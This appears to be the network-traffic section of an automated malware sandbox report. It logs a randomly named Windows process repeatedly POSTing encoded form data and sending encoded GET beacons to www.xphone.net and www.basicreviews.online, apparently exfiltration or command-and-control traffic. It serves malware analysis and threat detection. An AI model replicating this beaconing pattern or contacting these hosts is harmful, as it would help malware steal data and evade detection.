                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.xphone.net
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.xphone.net/i7vz/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 5a 71 66 56 6a 42 6c 68 75 71 50 63 37 31 44 47 6b 67 4f 58 41 45 42 46 37 33 69 2f 43 72 4d 6d 78 66 6d 4a 4d 34 36 30 4f 54 61 35 62 4e 7a 69 74 65 43 43 4c 57 58 56 54 46 33 47 45 71 41 53 35 4a 76 7a 44 6c 47 5a 67 68 6b 78 4b 33 62 6d 6d 45 77 4a 67 74 6d 64 57 77 4a 59 6e 54 31 56 68 46 31 37 41 53 30 37 51 51 2f 50 7a 2f 32 7a 75 63 4f 6c 62 7a 4b 5a 30 69 35 2f 4a 76 46 69 34 78 2b 31 39 39 5a 42 44 72 33 41 63 33 70 2b 64 30 46 38 59 31 46 36 59 6c 6c 61 34 48 5a 35 64 36 75 6d 33 42 56 30 44 42 33 38 37 65 45 71 72 68 6e 2b 67 51 46 77 6c 5a 46 6c 63 50 6d 51 4a 68 6f 56 54 30 31 44 61 35 65 4c 2f 2f 48 66 6d 70 6d 37 58 47 45 3d
                                                                        Data Ascii: 9B_ppt=ZqfVjBlhuqPc71DGkgOXAEBF73i/CrMmxfmJM460OTa5bNziteCCLWXVTF3GEqAS5JvzDlGZghkxK3bmmEwJgtmdWwJYnT1VhF17AS07QQ/Pz/2zucOlbzKZ0i5/JvFi4x+199ZBDr3Ac3p+d0F8Y1F6Ylla4HZ5d6um3BV0DB387eEqrhn+gQFwlZFlcPmQJhoVT01Da5eL//Hfmpm7XGE=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.45002813.248.169.48805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:09.526329994 CET10863OUTPOST /i7vz/ HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.xphone.net
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.xphone.net/i7vz/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 5a 71 66 56 6a 42 6c 68 75 71 50 63 37 31 44 47 6b 67 4f 58 41 45 42 46 37 33 69 2f 43 72 4d 6d 78 66 6d 4a 4d 34 36 30 4f 54 69 35 48 72 76 69 72 50 43 43 4b 57 58 56 56 31 33 48 45 71 41 31 35 49 4c 33 44 6c 4c 6d 67 6a 63 78 59 6b 54 6d 75 56 77 4a 71 74 6d 64 65 51 4a 5a 6a 54 31 36 68 42 52 33 41 53 6b 37 51 51 2f 50 7a 35 4b 7a 2b 64 4f 6c 5a 7a 4b 61 69 79 35 4e 65 2f 46 4f 34 31 53 44 39 38 49 30 41 61 58 41 63 54 4e 2b 66 47 39 38 41 6c 46 38 64 6c 6c 43 34 48 55 68 64 36 43 71 33 42 4a 65 44 42 44 38 72 71 52 6f 76 41 48 49 7a 6a 6c 76 79 4b 52 6d 61 39 32 4a 4f 68 63 2f 56 47 74 76 41 36 75 45 77 4e 75 6f 2f 59 47 49 4c 44 38 4a 63 33 35 43 42 7a 70 68 48 77 54 74 37 7a 5a 4b 4f 53 4a 61 79 2b 37 7a 43 78 54 6a 79 49 4a 55 69 7a 31 71 42 6e 2f 63 78 66 4e 6f 73 43 63 62 73 63 75 4b 56 2f 44 6e 54 73 74 58 43 61 6a 68 38 64 52 57 56 64 4a 50 45 57 75 63 4a 53 38 4d 76 56 68 39 59 6d 2b 2b 30 73 6b 32 4a 78 47 50 4a 46 75 4c 6d 49 41 54 72 53 6e 30 6e 7a 6e 77 34 68 6d [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=ZqfVjBlhuqPc71DGkgOXAEBF73i/CrMmxfmJM460OTi5HrvirPCCKWXVV13HEqA15IL3DlLmgjcxYkTmuVwJqtmdeQJZjT16hBR3ASk7QQ/Pz5Kz+dOlZzKaiy5Ne/FO41SD98I0AaXAcTN+fG98AlF8dllC4HUhd6Cq3BJeDBD8rqRovAHIzjlvyKRma92JOhc/VGtvA6uEwNuo/YGILD8Jc35CBzphHwTt7zZKOSJay+7zCxTjyIJUiz1qBn/cxfNosCcbscuKV/DnTstXCajh8dRWVdJPEWucJS8MvVh9Ym++0sk2JxGPJFuLmIATrSn0nznw4hmVTuwns4YdoIo69c4Ipqu8zcBe6LR51XkBYI+G3PQ6+pdlNI53BWcNeK26V2qkuMXzxfD+COsWUd3nu1JDKzu8AUnYrPxpRZNlASBnbdvdYHXZd/IpgtTAp0BMXdmQTbmaZqA8anUCnmnhlOS3xDkb2rgHsg53699ZN2NGVtIPFlE8RY1E/UKLP+OWR5i90ED5MicNHgBV5MjusrQwt6S/UymkbvWCe2Dn58yjXBhTskiYhqAgQpx4V0A0MIB/fXGcd0AUZpmpiV6FIbuzWlEVZTDG3DWQrJYt8bmXAee+WVD3nXudelOTy++HeWyZQPGR22rNL5d1Y4m8SEQig0YElUmvunBiPSlWWpvjd0aaHfcaY6A3pHFQDq5T9GFzbYN29jK6PZspt9GMQDxMrqwp4VLgCZrkQlOwy54w8R1TA0PRLwmS6Ym/VDv6nnfBVeMw15PZcMl921ngNPHXMXDyeDCqDKHYzSqHzGyc2rOcLBrofgyK0kdDDKrqhnYLkqE+uNP2WNfEGpBiVpAnX1hftdyuLrPqdsKQjWlb7iKAiSJwxHll6Ib4dfo5GBNYMs62O8xJBs8Cy+EHXTWhQM47DExEWSuNGZk6Amid//sfLp1fDSsxDIo4X0hFM4gpQpwlF22kmVF+bXIfLPDZiebmhoGqPQghn68+7 [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.45002913.248.169.48805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:12.176275015 CET509OUTGET /i7vz/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=Uo31g2cBlJ7Y51X9qiyWPllw2i3mGNMb8MW7X7OuPhPba7zW9vHCK1/tPALhEq4c3dLOMnOYn0E6ZXOZtUsElcj8T2RWijJqpTgaIG46XXD/8sezv8KfXnc= HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:09:16.285753965 CET383INHTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Fri, 13 Dec 2024 12:09:16 GMT
                                                                        content-length: 262
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 62 76 38 49 3d 52 66 50 44 59 76 49 48 74 4a 58 70 38 26 39 42 5f 70 70 74 3d 55 6f 33 31 67 32 63 42 6c 4a 37 59 35 31 58 39 71 69 79 57 50 6c 6c 77 32 69 33 6d 47 4e 4d 62 38 4d 57 37 58 37 4f 75 50 68 50 62 61 37 7a 57 39 76 48 43 4b 31 2f 74 50 41 4c 68 45 71 34 63 33 64 4c 4f 4d 6e 4f 59 6e 30 45 36 5a 58 4f 5a 74 55 73 45 6c 63 6a 38 54 32 52 57 69 6a 4a 71 70 54 67 61 49 47 34 36 58 58 44 2f 38 73 65 7a 76 38 4b 66 58 6e 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sbv8I=RfPDYvIHtJXp8&9B_ppt=Uo31g2cBlJ7Y51X9qiyWPllw2i3mGNMb8MW7X7OuPhPba7zW9vHCK1/tPALhEq4c3dLOMnOYn0E6ZXOZtUsElcj8T2RWijJqpTgaIG46XXD/8sezv8KfXnc="}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.450030144.76.190.39805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:22.270004034 CET788OUTPOST /r67x/ HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.basicreviews.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.basicreviews.online/r67x/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 34 45 74 74 56 57 49 66 30 6c 63 50 36 7a 57 6e 48 78 61 37 5a 59 78 74 6d 46 64 70 68 54 30 41 30 69 4d 33 71 2b 66 36 75 5a 70 59 50 39 52 6f 6e 47 69 35 6b 38 57 32 53 4f 61 50 30 37 63 33 44 73 67 75 4e 79 70 5a 53 36 36 48 75 46 55 4e 59 6b 2f 65 4e 30 53 6d 6f 46 30 6d 49 32 48 73 33 30 6d 6c 41 53 39 62 6d 77 35 4a 56 4d 69 30 6a 79 49 73 4a 75 4f 6b 36 44 4a 73 48 61 4f 4d 4e 46 43 45 55 32 2f 33 7a 76 46 49 68 6c 6d 73 66 4c 33 42 53 38 55 45 78 77 32 5a 75 43 4b 30 48 34 35 59 33 69 4e 63 41 75 6a 31 59 57 37 57 72 38 31 4c 37 49 2b 37 6d 78 65 67 51 6c 46 77 65 51 3d 3d
                                                                        Data Ascii: 9B_ppt=4EttVWIf0lcP6zWnHxa7ZYxtmFdphT0A0iM3q+f6uZpYP9RonGi5k8W2SOaP07c3DsguNypZS66HuFUNYk/eN0SmoF0mI2Hs30mlAS9bmw5JVMi0jyIsJuOk6DJsHaOMNFCEU2/3zvFIhlmsfL3BS8UExw2ZuCK0H45Y3iNcAuj1YW7Wr81L7I+7mxegQlFweQ==
                                                                        Dec 13, 2024 13:09:23.555135012 CET1045INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 771
                                                                        date: Fri, 13 Dec 2024 12:09:23 GMT
                                                                        server: LiteSpeed
                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                        location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.450031144.76.190.39805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:24.934504986 CET808OUTPOST /r67x/ HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.basicreviews.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.basicreviews.online/r67x/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 34 45 74 74 56 57 49 66 30 6c 63 50 37 53 6d 6e 63 53 43 37 51 59 78 75 69 31 64 70 34 44 30 45 30 6a 77 33 71 36 76 71 75 76 5a 59 50 5a 56 6f 6b 48 69 35 6a 38 57 32 4b 65 61 4b 77 37 63 38 44 73 38 51 4e 32 68 5a 53 36 2b 48 75 46 6b 4e 5a 54 44 64 4d 6b 53 67 6b 6c 30 67 57 47 48 73 33 30 6d 6c 41 53 6f 54 6d 30 56 4a 55 38 53 30 6a 58 38 76 49 75 4f 6c 73 54 4a 73 44 61 4f 41 4e 46 43 6d 55 33 6a 64 7a 70 4a 49 68 6c 32 73 65 65 44 43 4c 73 55 65 2f 51 33 58 74 51 6e 78 48 6f 46 54 79 52 67 36 41 73 2f 7a 51 77 32 4d 36 4e 55 63 70 49 61 49 37 32 58 55 64 6d 34 35 46 55 79 48 77 4b 49 43 51 51 4a 77 64 37 61 4d 50 46 76 38 43 4e 4d 3d
                                                                        Data Ascii: 9B_ppt=4EttVWIf0lcP7SmncSC7QYxui1dp4D0E0jw3q6vquvZYPZVokHi5j8W2KeaKw7c8Ds8QN2hZS6+HuFkNZTDdMkSgkl0gWGHs30mlASoTm0VJU8S0jX8vIuOlsTJsDaOANFCmU3jdzpJIhl2seeDCLsUe/Q3XtQnxHoFTyRg6As/zQw2M6NUcpIaI72XUdm45FUyHwKICQQJwd7aMPFv8CNM=
                                                                        Dec 13, 2024 13:09:26.190865040 CET1045INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 771
                                                                        date: Fri, 13 Dec 2024 12:09:25 GMT
                                                                        server: LiteSpeed
                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                        location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.450032144.76.190.39805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:27.605433941 CET10890OUTPOST /r67x/ HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.basicreviews.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.basicreviews.online/r67x/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 34 45 74 74 56 57 49 66 30 6c 63 50 37 53 6d 6e 63 53 43 37 51 59 78 75 69 31 64 70 34 44 30 45 30 6a 77 33 71 36 76 71 75 76 52 59 4f 73 42 6f 2b 67 32 35 69 38 57 32 44 2b 61 4c 77 37 63 62 44 73 30 63 4e 32 74 6e 53 34 32 48 68 45 45 4e 51 43 44 64 43 6b 53 67 35 56 30 6c 49 32 48 35 33 30 57 66 41 53 34 54 6d 30 56 4a 55 36 65 30 71 69 49 76 4b 75 4f 6b 36 44 4a 77 48 61 4f 73 4e 42 76 45 55 33 33 6e 77 5a 70 49 67 42 71 73 59 73 62 43 44 73 55 41 79 77 32 4b 74 51 72 36 48 72 77 71 79 51 56 66 41 75 6a 7a 56 33 66 6e 6c 2b 63 69 77 4a 79 4b 34 45 7a 77 46 6c 41 6b 63 55 75 6e 39 6f 6f 32 54 68 31 50 59 34 50 2b 64 41 6e 42 63 70 41 4a 4f 4f 4a 78 6c 4f 31 79 55 34 39 47 65 41 44 50 49 4d 7a 68 49 4b 31 53 6b 66 42 4e 46 32 54 77 34 74 39 6d 41 74 33 2f 6d 44 4e 43 69 6e 6b 7a 46 6e 31 37 79 35 36 33 32 55 68 32 6b 52 70 56 49 74 6b 5a 55 4f 61 6d 78 53 6c 48 51 65 4e 6f 39 43 51 61 74 69 57 34 52 49 5a 43 62 77 55 69 6a 6c 72 77 4b 45 69 4d 6d 35 79 2f 43 58 5a 73 2b 6e 42 [TRUNCATED]
                                                                        Data Ascii: 9B_ppt=4EttVWIf0lcP7SmncSC7QYxui1dp4D0E0jw3q6vquvRYOsBo+g25i8W2D+aLw7cbDs0cN2tnS42HhEENQCDdCkSg5V0lI2H530WfAS4Tm0VJU6e0qiIvKuOk6DJwHaOsNBvEU33nwZpIgBqsYsbCDsUAyw2KtQr6HrwqyQVfAujzV3fnl+ciwJyK4EzwFlAkcUun9oo2Th1PY4P+dAnBcpAJOOJxlO1yU49GeADPIMzhIK1SkfBNF2Tw4t9mAt3/mDNCinkzFn17y5632Uh2kRpVItkZUOamxSlHQeNo9CQatiW4RIZCbwUijlrwKEiMm5y/CXZs+nBYsp++U9RjIJd0hMz9PHIzfO/SYv2whHoBZICaptjkCKzb2w55x6R09HD+AbBmETXbF/NhuSNX5OhbbNoUppSVQYl0AKhZlLaoNVovRQnqFwpnOpf0x+j7g3+eAGMOpMI5SKHxmSPlN9xIG939bJ3D9rFbCzslmvViiB80sLyyvPkGjRRdH9REJ5RgWnraovR8E94U38WlLknb8YTuonCQxQfLi7HzCDWFsz6LHOgRiOe9iAyUYm3Bav7S91O56uYL0LUROCeQA7PElp+iWJkLbOphDTFEhprtUSYSoFp0GMCy4QWi6JXz+IrSBiY+lw+DutidxFfQPhbegLHflZD8dfnN3R/0oVAbL8UnLtlb71WtbhfLbMeGJPQMix/GxoQxYwkMygftcpLtpnILoLqydVrUZu9pGyopIdtB+wmXT4quAfn80sB3vWKSFPz00hKD1OUeCV5Xh+xHM0l5D2I30ThM5E8TsoQ1k559uTikcJrPNCvMbS2rfQCiXt1TrABHplgo2QDzrIpwYDjELk+SV1Jv9rLruXGcYZ1MVUdReaV73eyq02Hs0/i0ggDnviWnuWwA1tYd5SHkb/daRqJO0HYVVw5g/oO0wf71oAF4qKdBzq+xdTDZSkO8BDeAdG2RV1SyaSNj7zKgEC/gmgLfbep7iWVRmHWnf [TRUNCATED]
                                                                        Dec 13, 2024 13:09:27.841203928 CET1236OUTData Raw: 65 6e 59 54 69 79 33 71 75 35 6f 68 58 65 57 48 34 44 35 56 71 2b 71 59 6e 62 59 4f 32 52 46 2b 38 4e 64 63 72 35 64 7a 4c 49 6c 61 4a 52 6b 56 4c 70 2f 4c 31 52 4e 34 45 4f 6e 31 55 38 77 55 6c 4c 44 74 51 44 30 6b 45 33 43 34 66 6e 4d 55 67 46
                                                                        Data Ascii: enYTiy3qu5ohXeWH4D5Vq+qYnbYO2RF+8Ndcr5dzLIlaJRkVLp/L1RN4EOn1U8wUlLDtQD0kE3C4fnMUgFgfqpAcLdXpJjLrpqh8NL6pFhfibJqlCrPGG5miPx3EQcv/9h1aRYxyH3SEEDVr84KDfmpQ3E0tx6gSNpn6FoumNzPzWcEdK+2j9PAkH5ZHyBbFiCagmwdv3ZYwpEg5AQoo2y7wJCPl4GVSgaLCXTOJt+fVuXC8RVF


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.450033144.76.190.39805580C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 13, 2024 13:09:30.255120993 CET518OUTGET /r67x/?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYztsjxkrAaNpZX0l6jkYi+VfuO97QxGNgBCFFWLt6B6VM0bCruEmjStFMTCnvezkXJEF9Ro0QfaPDcmWgUP4M=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:09:31.568196058 CET1193INHTTP/1.1 302 Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 771
                                                                        date: Fri, 13 Dec 2024 12:09:31 GMT
                                                                        server: LiteSpeed
                                                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                        location: http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?9B_ppt=1GFNWjEU8kwZ/mmLeya/cJNKrhAK4goi9jYztsjxkrAaNpZX0l6jkYi+VfuO97QxGNgBCFFWLt6B6VM0bCruEmjStFMTCnvezkXJEF9Ro0QfaPDcmWgUP4M=&Sbv8I=RfPDYvIHtJXp8
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
